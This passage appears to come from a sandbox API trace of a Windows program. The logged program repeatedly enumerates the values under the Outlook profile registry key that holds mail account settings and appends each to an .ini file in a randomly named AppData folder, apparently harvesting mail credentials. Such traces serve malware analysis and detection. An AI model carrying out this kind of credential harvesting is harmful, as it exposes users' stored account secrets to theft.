EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.707] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.707] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.707] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0xc, ByteOffset=0x19d600*=40, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.707] NtClose (Handle=0xbc) returned 0x0 [0239.708] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.708] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.708] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.708] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.708] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x52, ByteOffset=0x19d600*=52, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.708] NtClose (Handle=0xbc) returned 0x0 [0239.711] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0239.711] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.711] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.711] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.711] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.711] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x12, ByteOffset=0x19d600*=134, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.711] NtClose (Handle=0xbc) returned 0x0 [0239.721] RtlIntegerToChar (in: Value=0x784af68b, Base=0x0, Length=0x20, String=0x19d6e8 | out: String="2018178699") returned 0x0 [0239.721] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.722] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.722] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.722] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.722] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x18, ByteOffset=0x19d600*=152, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.722] NtClose (Handle=0xbc) returned 0x0 [0239.723] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0239.723] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.723] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.723] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.723] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.723] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x18, ByteOffset=0x19d600*=176, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.724] NtClose (Handle=0xbc) returned 0x0 [0239.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.724] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.725] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.725] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.725] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x14, ByteOffset=0x19d600*=200, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.725] NtClose (Handle=0xbc) returned 0x0 [0239.726] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0239.726] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.726] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.726] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.726] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.726] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1a, ByteOffset=0x19d600*=220, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.726] NtClose (Handle=0xbc) returned 0x0 [0239.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.727] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.727] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.727] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.727] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x12, ByteOffset=0x19d600*=246, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.727] NtClose (Handle=0xbc) returned 0x0 [0239.728] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0239.729] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.729] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.729] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.729] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.729] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1c, ByteOffset=0x19d600*=264, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.729] NtClose (Handle=0xbc) returned 0x0 [0239.738] RtlIntegerToChar (in: Value=0x2, Base=0x0, Length=0x20, String=0x19d6e8 | out: String="2") returned 0x0 [0239.738] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.738] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.739] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.739] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.739] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x6, ByteOffset=0x19d600*=292, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.739] NtClose (Handle=0xbc) returned 0x0 [0239.740] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0239.740] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.740] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.740] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.740] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.740] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1a, ByteOffset=0x19d600*=298, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.740] NtClose (Handle=0xbc) returned 0x0 [0239.741] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.741] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.741] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.741] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.741] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x2e, ByteOffset=0x19d600*=324, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.742] NtClose (Handle=0xbc) returned 0x0 [0239.742] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0239.742] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.742] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.743] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.743] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.743] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x20, ByteOffset=0x19d600*=370, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.743] NtClose (Handle=0xbc) returned 0x0 [0239.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.744] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.744] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.744] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.744] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x14, ByteOffset=0x19d600*=402, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.745] NtClose (Handle=0xbc) returned 0x0 [0239.746] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x8000001a [0239.746] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d720, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.746] NtCreateFile (in: FileHandle=0x19d740, DesiredAccess=0x12019f, ObjectAttributes=0x19d708*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d728, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d740*=0xbc, IoStatusBlock=0x19d728*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.746] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.746] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d728, FileInformation=0x19d680, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d728, FileInformation=0x19d680) returned 0x0 [0239.746] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d728, Buffer=0x422670*, Length=0x4, ByteOffset=0x19d698*=422, Key=0x0 | out: IoStatusBlock=0x19d728, Buffer=0x422670*) returned 0x0 [0239.746] NtClose (Handle=0xbc) returned 0x0 [0239.747] NtClose (Handle=0x104) returned 0x0 [0239.747] NtEnumerateKey (in: KeyHandle=0x108, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x0 [0239.748] NtCreateKey (in: KeyHandle=0x19e3d0, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d0*=0x104) returned 0x0 [0239.748] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0239.748] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.748] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", 